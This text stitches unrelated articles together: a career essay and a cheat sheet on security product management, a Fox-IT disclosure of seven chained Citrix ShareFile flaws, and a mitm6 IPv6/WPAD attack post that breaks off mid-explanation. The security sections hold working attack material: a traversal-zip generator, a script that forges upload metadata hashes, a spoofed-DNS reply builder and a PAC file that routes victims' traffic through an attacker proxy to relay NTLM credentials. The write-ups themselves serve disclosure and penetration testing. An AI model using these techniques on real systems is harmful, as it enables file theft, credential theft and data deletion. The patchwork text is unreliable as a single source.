I also appreciated the chance to develop expertise in the industries that my employer serviced, so I could position infosec benefits in the context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After a while I decided to leave because I was starting to feel a bit too comfortable. I also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary, aspects of product management at a startup is that you’re starting the product from a clean slate. While product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the onset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help the startup determine which of its product capabilities customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often depend on the person’s interpretation of it, shaped by the person’s strengths and the company’s needs at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the “it’s not my job” attitude than those in highly-structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details regarding this, see my article What’s It Like to Join a Startup’s Executive Team?)

Customer Reach

A product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats that the product manager needs to wear, sometimes acting as a sales engineer and at times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, until the firm builds up steam, a young company simply lacks a sales force with the scale to reach many customers. (See Access to Customers above.) This means that the product manager might need to help identify prospects, which can be outside the comfort zone of individuals who haven’t participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

There are lots of challenges, of course, but every day feels like an adventure, as we fight for a seat at the big kids’ table, grow the customer base and break new ground with innovative anti-malware approaches. It’s a risky environment with high highs and low lows, but it feels like the right place for me right now.

Which Setting is Best for You?

Numerous differences between startups and large companies affect the experience of working in these firms. The distinction is especially pronounced for product managers, who oversee the creation of the solutions these companies sell. You need to understand these differences before deciding which environment is best for you, but that’s just a start. Next, understand what is best for you, given where you are in life and your professional development. Sometimes the capabilities you’ll have as a product manager in an established firm will be just right; at other times, you will thrive in a startup. Work in the environment that appeals to you, but also know when (or whether) it’s time to make a change.

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities which, together, allowed any account to access any file stored within ShareFile from the internet. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several Fortune 500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the file transfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request, such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see an h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following Python code creates a special zip file containing two files, one of which has a relative path.

import zipfile
# the name of the zip file to generate (placeholder name; the original was redacted)
zf = zipfile.ZipFile('traversal.zip', 'w')
# the name of the malicious file that will overwrite the original file (must exist on disk)
fname = 'xxe_oob.xml'
# destination path of the file inside the archive, containing the traversal
zf.write(fname, '../../../../testbestand_fox.tmp')
# random extra file (not required)
# example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')
zf.close()

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user-controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path is c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\; we can then add a file with the name ../storage/subdirectory/filename.txt, which will be written to the target directory. The ../ part indicates that the operating system should go one directory higher in the directory tree and use the rest of the path from that location.
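To illustrate, here is a minimal Python sketch of the traversal; the directory names are illustrative, not ShareFile's actual paths:

```python
import posixpath

# hypothetical extraction root; the real ShareFile directory differs
extract_root = '/data/sharefile/temp'
entry = '../storage/subdirectory/filename.txt'

# a naive extractor simply joins the archive entry name onto the root
dest = posixpath.normpath(posixpath.join(extract_root, entry))
# the '../' components climb out of the intended directory, so the file
# would land in /data/sharefile/storage/subdirectory/filename.txt

# a safe extractor verifies that the resolved path stays under the root
is_safe = posixpath.commonpath([extract_root, dest]) == extract_root
```

Because the resolved destination escapes the extraction root, the safety check fails, which is precisely the condition a correct extractor would reject.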

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistentstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name and the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32-character uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying for a while to figure out what kind of hashing algorithm was used for the integrity check of this file, it turned out to be a simple md5 hash of the rest of the data in the info.txt file. The twist is that the data is encoded as UTF-16-LE, the default encoding for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import hashlib

with open('info_modified.txt', 'r') as infile:
    instr = infile.read().split('|')
# drop the old hash at the end and rejoin the remaining fields
instr2 = u'|'.join(instr[:-1])
# md5 over the UTF-16-LE encoded data, upper-case hex digest
outhash = hashlib.md5(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt', 'w') as outfile:
    outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as the temporary name for the file. The data that is uploaded is written to this file, and when the upload is finalized this file is added to the user's ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename in order to extract a test file called secret.txt, which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the file size of the secret.txt file we are trying to extract is 14 bytes instead of the 13 that the modified info.txt indicated. We upload a new info.txt file with the correct file size, and the secret.txt file is successfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, this time via the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need an existing info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the requested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter, which contains the download token. Additionally there is an h parameter containing an HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.
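As a rough sketch of how such URL authorization works in general (the key, hash algorithm and canonical string below are assumptions for illustration, not ShareFile's actual scheme):

```python
import base64
import hashlib
import hmac

# illustrative key and protected URL portion; ShareFile's real values differ
key = b'zone-secret'
protected = 'dt=<download-token>&filename=testfile'

# the issuer computes a MAC over the protected part of the URL
h = base64.urlsafe_b64encode(
    hmac.new(key, protected.encode(), hashlib.sha256).digest()
).decode()

# the server recomputes the MAC and compares it in constant time
valid = hmac.compare_digest(
    base64.urlsafe_b64decode(h),
    hmac.new(key, protected.encode(), hashlib.sha256).digest(),
)
```

Any change to the protected portion of the URL would produce a different MAC, so the check fails unless the attacker knows the key.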

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).
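The path construction described above can be reproduced in a few lines of Python, using the IDs from the example token:

```python
# reconstructing the storage path from the IDs in the token above
account_id = 'a4ea881a-a4d5-433a-fa44-41acd5ed5a5f'
file_id = 'fi0f0f2e_3477_4647_9cdd_e89758c21c37'

# the two characters following the 'fi' prefix are repeated as two
# nested subdirectories (presumably to keep folder listings small)
sub = file_id[2:4]
path = '\\'.join([account_id, sub, sub, file_id])
```

This yields exactly the path seen in the token's File element.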

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a .NET program running under IIS, it is trivial to decompile the binaries with tools such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Integrity of token XML files not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not necessary to calculate the signature as an attacker, since the application simply tells you the correct signature if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended
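The secret-prefix construction can be sketched as follows (the secret and data values are illustrative); this sha1(secret || data) pattern is exactly what length extension targets, whereas an HMAC construction avoids it:

```python
import hashlib
import hmac

secret = b'static-key'                   # illustrative, not the real key
data = b'<ShareFileDownloadInfo ...>'    # illustrative token data

# the scheme found in the decompiled code: sha1 over secret prepended to data
signature = hashlib.sha1(secret + data).hexdigest()

# with sha1(secret || data), anyone holding a valid (data, signature) pair
# can append attacker-chosen data and forge a new valid signature without
# knowing the secret (length extension); HMAC-SHA1 does not have this flaw
hmac_signature = hmac.new(secret, data, hashlib.sha1).hexdigest()
```

The two constructions produce different digests for the same inputs; only the second is safe against length extension.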

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation of this path taking place, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains an HMAC, which makes modifying this parameter seemingly impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request and used to verify all parameters in the URL before the h parameter. Thus any parameters following the h in the URL are completely unverified!
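A simplified Python sketch of this flawed verification (the key and MAC algorithm are assumptions for illustration) shows why: only the part of the query string before the h parameter is covered by the MAC:

```python
import hashlib
import hmac

KEY = b'zone-secret'  # illustrative; the real key is unknown here

def sign(query_prefix):
    # MAC over the query string up to (but not including) the h parameter
    return hmac.new(KEY, query_prefix.encode(), hashlib.sha256).hexdigest()

def flawed_verify(query):
    # split the query string at the h parameter; everything after it is
    # never inspected, mirroring the behaviour described above
    prefix, _, rest = query.partition('&h=')
    mac = rest.split('&', 1)[0]
    return hmac.compare_digest(mac, sign(prefix))

base = 'uploadid=rsu-becc299a4b9c421ca024dec2b4de7376&filename=test'
url = base + '&h=' + sign(base)

# appending extra, attacker-controlled parameters still passes verification
polluted_ok = flawed_verify(url + '&uploadid=foxtest')
```

Tampering with anything before the h parameter breaks the MAC, but anything appended after it sails through unchecked.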

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values, separated with a comma. Only the first uploadid parameter is verified by the HMAC, since the verification operates on the query string instead of the individual parameter values, and only covers the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Pollution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)
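The concatenation behaviour can be mimicked with Python's standard query-string parser; ASP.NET's Request.QueryString performs the comma join automatically:

```python
from urllib.parse import parse_qs

# duplicate uploadid parameters, as in the polluted URL above
qs = 'uploadid=rsu-becc299a4b9c421ca024dec2b4de7376&h=MAC&uploadid=foxtest'
params = parse_qs(qs)

# parse_qs keeps every occurrence of a parameter; IIS/ASP.NET joins the
# values with a comma, which is how the second, unverified value reaches
# the upload logic
uploadid = ','.join(params['uploadid'])
```

The resulting combined value matches the ID seen in the error message above, comma and all.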

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attacker’s account this way also recursively deletes all files and folders in the temporary directory. By traversing to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Integrity of token XML files not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick to follow up on the issues, rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown whether they were using the hybrid setup in a vulnerable configuration. Therefore, the number of affected installations, and whether these issues were abused, is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solution’s key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the price based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine the technical steps, personnel, tools, support requirements and the associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationship for product delivery, if necessary.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who has been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

mitm6 – compromising IPv4 networks via IPv6

While IPv6 adoption is increasing on the internet, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this blog, an attack is presented that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker-specified endpoint. In the second phase of this attack, a new method is outlined to exploit the (infamous) Windows Proxy Auto Discovery (WPAD) feature in order to relay credentials and authenticate to various services within the network. The tool Fox-IT created for this is called mitm6, and is available from the Fox-IT GitHub.

IPv6 attacks

Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on, and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described in 2011 by Alex Waters from the Infosec Institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network by setting up a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test, since it rapidly destabilizes the network. Additionally, the attack requires quite a few external packages and services to work. mitm6 is a tool which focuses on an easy-to-set-up solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network’s regular operation. The result is a Python script which requires almost no configuration and gets the attack running in seconds. When the attack is stopped, the network reverts to its previous state within minutes due to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts with listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attacker’s IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows-based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker's IP as DNS server. Optionally, it will periodically send Router Advertisement (RA) messages to alert clients that there is an IPv6 network in place and that they should request an IPv6 address via DHCPv6. This will in some cases speed up the attack, but it is not required for the attack to work, making it possible to execute this attack on networks that have protection against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as the DNS server. Due to the preference of Windows regarding IP protocols, the IPv6 DNS server will be preferred over the IPv4 DNS server, and it will be used to query for both A (IPv4) and AAAA (IPv6) records.


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is getting the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. In the screenshot in step 1, you can see that the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the behaviour we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection (WPAD) feature has been a much-debated one, and one that penetration testers have abused for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which supplies this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attacker's server, and then prompt for authentication to access the WPAD file. Windows provided this authentication by default, without requiring user interaction. This could provide the attacker with NTLM credentials from the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

In 2016 however, Microsoft published a security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can simply reply with its own IP address (either IPv4 or IPv6, depending on what the victim's machine asks for). This also works if the organization is already using a WPAD file (though in this case it will prevent the victim's connections from reaching the internet).
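To make the DNS side concrete, here is a minimal, self-contained sketch of how a spoofed A-record reply can be built from a raw query. This is illustrative only: the real mitm6 also answers AAAA queries and filters on the configured target domain, and the packet handling here is deliberately simplistic (single question, no EDNS):

```python
import socket
import struct

def spoof_a_response(query: bytes, attacker_ip: str) -> bytes:
    """Answer any single-question A query in `query` with `attacker_ip`."""
    txid = query[:2]                           # echo the transaction ID
    flags = struct.pack(">H", 0x8180)          # standard response, RD+RA, no error
    counts = struct.pack(">HHHH", 1, 1, 0, 0)  # 1 question, 1 answer
    question = query[12:]                      # echo the question section verbatim
    answer = (
        b"\xc0\x0c"                            # compression pointer to the query name
        + struct.pack(">HHIH", 1, 1, 60, 4)    # type A, class IN, TTL 60, rdlength 4
        + socket.inet_aton(attacker_ip)
    )
    return txid + flags + counts + question + answer
```

A listener would feed each UDP datagram received on port 53 through this function and send the result straight back to the querying client.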

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file we won't request authentication, but instead provide it with a valid WPAD file where the attacker's machine is set as a proxy. When the victim now runs any application that uses the Windows API to connect to the internet, or simply starts browsing the web, it will use the attacker's machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
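For reference, a served WPAD file is just a small JavaScript PAC script. The hostname and port below are placeholders for illustration, not values used by any particular tool:

```javascript
// Illustrative wpad.dat (PAC) file. "attacker.testsegment.local" and
// port 8080 are hypothetical; every request is routed through the rogue proxy.
function FindProxyForURL(url, host) {
    return "PROXY attacker.testsegment.local:8080";
}
```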
Now when the victim connects to our “proxy” server, which we can identify by the use of the CONNECT HTTP verb or the presence of a full URI after the GET verb, we reply with an HTTP 407 Proxy Authentication Required. This is different from the HTTP code normally used to request authentication, HTTP 401.
